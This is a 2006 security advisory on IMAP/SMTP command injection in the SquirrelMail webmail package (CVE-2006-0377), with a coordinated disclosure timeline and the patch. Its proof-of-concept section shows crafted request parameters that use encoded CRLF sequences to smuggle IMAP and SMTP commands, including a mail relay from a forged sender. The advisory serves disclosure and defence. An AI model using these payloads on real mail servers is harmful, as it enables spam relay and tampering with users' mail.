SquirrelFlaws.txt

`=============================================  
INTERNET SECURITY AUDITORS ALERT 2006-002  
- Original release date: February 27, 2006  
- Last revised: February 27, 2006  
- Discovered by: Vicente Aguilera Diaz  
- Severity: 3/5  
=============================================  
I. VULNERABILITY  
-------------------------  
IMAP/SMTP Injection in SquirrelMail  
  
  
II. BACKGROUND  
-------------------------  
SquirrelMail is a standards-based webmail package written in PHP4. It  
includes built-in pure PHP support for the IMAP and SMTP protocols,  
and all pages render in pure HTML 4.0 (with no JavaScript required)  
for maximum compatibility across browsers. It has very few  
requirements and is very easy to configure and install. SquirrelMail  
has all the functionality you would want from an email client,  
including strong MIME support, address books, and folder manipulation.  
The product homepage is http://www.squirrelmail.org.  
  
  
III. DESCRIPTION  
-------------------------  
SquirrelMail provides a graphical interface to interact with mail  
servers across the IMAP and SMTP protocols.  
Improper command and information validation transmitted by  
SquirrelMail to the mail servers during the normal use of this  
application (mailbox management, e-mail reading and sending, etc.)  
facilitates that an authenticate malicious user could inject arbitrary  
IMAP/SMTP commands into the mail servers used by SquirrelMail across  
parameters used by the webmail front-ent in its communication with  
these mail servers.  
This is become dangerous because the injection of these commands  
allows an intruder to evade restrictions imposed at application level,  
and exploit vulnerabilities that could exist in the mail servers  
through IMAP/SMTP commands.  
  
  
IV. PROOF OF CONCEPT  
-------------------------  
  
== IMAP example (1.4.2 version) =============  
SquirrelMail Vulnerable parameter: "mailbox"  
  
When a user clicks in the subject of an e-mail, he creates a GET  
request as:  
http://<victim>/src/read_body.php?mailbox=INBOX&passed_id=1&startMessage=1&show_more=0  
  
A malicious user can modify the value of the "mailbox" parameter and  
inject any IMAP command.  
The IMAP command injection has the following structure:  
http://<victim>/src/read_body.php?mailbox=INBOX%22%0D%0<ID>  
<INJECT_IMAP_COMMAND_HERE>%0D%0A<ID>  
%20SELECT%20%22INBOX&passed_id=<CODE>&startMessage=1  
  
Example:  
Injection of the RENAME IMAP command across the "mailbox" parameter:  
http://<victim>/src/read_body.php?mailbox=INBOX%22%0D%0AZ900%20RENAME%20Trash%20Basura%0d%0aZ910%20SELECT%20%22INBOX&passed_id=22197&startMessage=1  
  
  
  
== SMTP example (1.2.7 version) =============  
SquirrelMail Vulnerable parameter: "subject" (and possibly others)  
  
When a user send a message, he create a POST request like:  
POST http://<victim>/src/compose.php HTTP/1.1  
  
...  
-----------------------------84060780712450133071594948441  
Content-Disposition: form-data; name="subject"  
  
Proof of Concept  
-----------------------------84060780712450133071594948441  
...  
  
A malicious user can modify the value of the "subject" parameter and  
inject any SMTP command.  
Example: Relay from a non-existent e-mail address  
  
...  
-----------------------------84060780712450133071594948441  
Content-Disposition: form-data; name="subject"  
  
Proof of Concept%0d%0a.%0d%0a%0d%0amail from:  
[email protected]%0d%0arcpt to:  
[email protected]%0d%0adata%0d%0aThis is a proof of concept of  
the SMTP command injection in SquirrelMail%0d%0a.%0d%0a  
-----------------------------84060780712450133071594948441  
...  
  
  
V. BUSINESS IMPACT  
-------------------------  
The IMAP/SMTP command injection allow relay, SPAM, exploit IMAP and  
SMTP vulnerabilities in the mail servers and evade all the  
restrictions at the application layer.  
  
  
VI. SYSTEMS AFFECTED  
-------------------------  
IMAP Injection: All versions prior to 1.4.6.  
SMTP Injection: SquirrelMail 1.2.7 (and older versions).  
  
  
VII. SOLUTION  
-------------------------  
Replace \r and \n from $mailbox in the function sqimap_mailbox_select.  
Patch available: http://www.squirrelmail.org/security/issue/2006-02-15  
  
  
VIII. REFERENCES  
-------------------------  
- http://www.squirrelmail.org/security/issue/2006-02-15  
- CVE-2006-0377  
  
  
IX. CREDITS  
-------------------------  
This vulnerability has been discovered and reported by Vicente  
Aguilera Diaz (vaguilera=at=isecauditors=dot=com).  
  
  
X. REVISION HISTORY  
-------------------------  
January 12, 2006: Initial release  
January 20, 2006: Disclosure timeline updated  
February 16, 2006: Disclosure timeline updated  
February 27, 2006: Disclosure timeline updated  
  
  
XI. DISCLOSURE TIMELINE  
-------------------------  
December, 2005 Vulnerability acquired by Vicente Aguilera Diaz  
(Internet Security Auditors)  
January 12, 2006 Initial vendor notification sent.  
January 19, 2006 The vulnerability is fixed in 1.4.6 cvs and  
1.5.1 cvs.  
February 15, 2006 The vendor published the vulnerability in the  
security section.  
February 25, 2006 The CVE-2006-0377 is updated.  
  
  
`